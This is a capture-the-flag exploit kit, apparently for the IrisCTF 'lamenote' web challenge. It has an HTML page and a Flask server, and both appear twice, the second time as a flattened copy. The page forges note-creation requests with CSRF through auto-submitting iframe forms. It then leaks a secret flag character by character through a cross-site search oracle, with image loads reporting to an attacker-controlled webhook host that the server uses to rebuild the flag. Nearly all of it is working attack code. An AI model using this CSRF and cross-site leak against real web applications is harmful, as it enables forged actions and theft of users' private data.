nyxsorcerer/csrf.html

## csrf.html
<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Document</title>
</head>
<body>
    <iframe id="stuff" frameborder="0"></iframe>
    <script>
        function makeid(length) {
            let result = '';
            const characters = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789';
            const charactersLength = characters.length;
            let counter = 0;
            while (counter < length) {
            result += characters.charAt(Math.floor(Math.random() * charactersLength));
            counter += 1;
            }
            return result;
        }

        let webhook = "https://nyxmare.world/"
        let remote = "https://lamenote-web.chal.irisc.tf/"
        // fetch status on mine
        // create A-Z} iframe for csrf
        // delete srcdoc, add src into /search?query=FLAG{A-Z}
        //
        const sleep = ms => new Promise(r => setTimeout(r, ms));
        async function check_known() {
            let res = await fetch(webhook + "known")
            return res.text()
        }
        async function main (){
            let charset = "abcdefghijklmnopqrstuvwxyz_}"
            await check_known().then(async function(r){
                if(r.endsWith("}")){ return 1; }
                for(let _ in charset){
                    data_csrf = `data:text/html,
                            <html\x3e
                    <body\x3e
                        <form action="${remote}create" method="POST">
                        <input type="hidden" name="title" value="${makeid(32)}" />
                        <input type="hidden" name="text" value="${r+charset[_]}" />
                        <input type="hidden" name="image" value="${webhook}iterate?c=${r + charset[_]}&' referrerpolicy='unsafe-url" />
                        <input type="submit" value="Submit request" />
                        </form\x3e
                        <script\x3e
                        document.forms[0].submit();
                        </script\x3e
                    </body\x3e
                    </html\x3e`
                    console.log(r + charset[_])
                    let iframeWrap = document.createElement('iframe')
                    iframeWrap.src = data_csrf
                    iframeWrap.id = "nyx_"+(charset[_]).replace("}", "_")
                    document.body.appendChild(iframeWrap)
                }
                await sleep(1*1000)

                for(let _ in charset){
                    let iframeWrap = document.body.querySelector("#nyx_"+(charset[_]).replace("}", "_"))
                    iframeWrap.removeAttribute('srcdoc')
                    iframeWrap.src = remote + `search?query=${r + charset[_]}`
                }

                await sleep(3*1000)
                await fetch(webhook + `iterate?c=CHECK`)
                location.reload()
            })
        }

        main()


    </script>
</body>
</html>

## index.html
<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Document</title>
</head>
<body>
    <!-- <iframe id="stuff" src="https://lamenote-web.chal.irisc.tf/search?query=" frameborder="0"></iframe> -->
    <script>
        const sleep = ms => new Promise(r => setTimeout(r, ms));

        async function main (){
            window.open('/csrf')
        }

        main()
    </script>
</body>
</html>

## serv.py
from flask import *
from urllib.parse import urlparse
from functools import wraps
import string

chars = []
known = "irisctf{please_no_more_unintended_bug"
app = Flask(__name__)

@app.after_request
def csp(response):
    response.headers["Access-Control-Allow-Origin"] = "*"
    return response

@app.route("/")
def index():
    return "idklol"

@app.route("/start_exp")
def exp():
    return send_file("index.html")

@app.route("/csrf")
def csrf():
    return send_file("csrf.html")

@app.route("/known")
def known_():
    global known
    print(known)
    return known

def check_not_exists():
    global chars, known
    charset = list(string.ascii_lowercase + "_}")
    for x in chars:
        if x in charset:
            charset.remove(x)
    print(charset)
    known += charset[0]
    print(known)
    chars = []
    pass

@app.route("/iterate", methods=["GET", "OPTIONS"])
def home():
    global chars
    char = request.args.get("c", "(empty)").replace(known, "")
    ref = request.headers.get("Referer", "")
    print(ref)
    if "/note/" in ref:
        return ""
    if(char == 'CHECK'):
        check_not_exists()
    elif(char == '(empty)'):
        print("SOMETHING WENT WRONG")
    else:
        print(chars)
        chars.append(char)
    return ""

app.run("0.0.0.0", 80)
	<!DOCTYPE html>
	<html lang="en">
	<head>
	<meta charset="UTF-8">
	<meta name="viewport" content="width=device-width, initial-scale=1.0">
	<title>Document</title>
	</head>
	<body>
	<iframe id="stuff" frameborder="0"></iframe>
	<script>
	function makeid(length) {
	let result = '';
	const characters = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789';
	const charactersLength = characters.length;
	let counter = 0;
	while (counter < length) {
	result += characters.charAt(Math.floor(Math.random() * charactersLength));
	counter += 1;
	}
	return result;
	}

	let webhook = "https://nyxmare.world/"
	let remote = "https://lamenote-web.chal.irisc.tf/"
	// fetch status on mine
	// create A-Z} iframe for csrf
	// delete srcdoc, add src into /search?query=FLAG{A-Z}
	//
	const sleep = ms => new Promise(r => setTimeout(r, ms));
	async function check_known() {
	let res = await fetch(webhook + "known")
	return res.text()
	}
	async function main (){
	let charset = "abcdefghijklmnopqrstuvwxyz_}"
	await check_known().then(async function(r){
	if(r.endsWith("}")){ return 1; }
	for(let _ in charset){
	data_csrf = `data:text/html,
	<html\x3e
	<body\x3e
	<form action="${remote}create" method="POST">
	<input type="hidden" name="title" value="${makeid(32)}" />
	<input type="hidden" name="text" value="${r+charset[_]}" />
	<input type="hidden" name="image" value="${webhook}iterate?c=${r + charset[_]}&' referrerpolicy='unsafe-url" />
	<input type="submit" value="Submit request" />
	</form\x3e
	<script\x3e
	document.forms[0].submit();
	</script\x3e
	</body\x3e
	</html\x3e`
	console.log(r + charset[_])
	let iframeWrap = document.createElement('iframe')
	iframeWrap.src = data_csrf
	iframeWrap.id = "nyx_"+(charset[_]).replace("}", "_")
	document.body.appendChild(iframeWrap)
	}
	await sleep(1*1000)

	for(let _ in charset){
	let iframeWrap = document.body.querySelector("#nyx_"+(charset[_]).replace("}", "_"))
	iframeWrap.removeAttribute('srcdoc')
	iframeWrap.src = remote + `search?query=${r + charset[_]}`
	}

	await sleep(3*1000)
	await fetch(webhook + `iterate?c=CHECK`)
	location.reload()
	})
	}

	main()



	</script>
	</body>
	</html>
	from flask import *
	from urllib.parse import urlparse
	from functools import wraps
	import string

	chars = []
	known = "irisctf{please_no_more_unintended_bug"
	app = Flask(__name__)

	@app.after_request
	def csp(response):
	response.headers["Access-Control-Allow-Origin"] = "*"
	return response

	@app.route("/")
	def index():
	return "idklol"

	@app.route("/start_exp")
	def exp():
	return send_file("index.html")

	@app.route("/csrf")
	def csrf():
	return send_file("csrf.html")

	@app.route("/known")
	def known_():
	global known
	print(known)
	return known

	def check_not_exists():
	global chars, known
	charset = list(string.ascii_lowercase + "_}")
	for x in chars:
	if x in charset:
	charset.remove(x)
	print(charset)
	known += charset[0]
	print(known)
	chars = []
	pass

	@app.route("/iterate", methods=["GET", "OPTIONS"])
	def home():
	global chars
	char = request.args.get("c", "(empty)").replace(known, "")
	ref = request.headers.get("Referer", "")
	print(ref)
	if "/note/" in ref:
	return ""
	if(char == 'CHECK'):
	check_not_exists()
	elif(char == '(empty)'):
	print("SOMETHING WENT WRONG")
	else:
	print(chars)
	chars.append(char)
	return ""

	app.run("0.0.0.0", 80)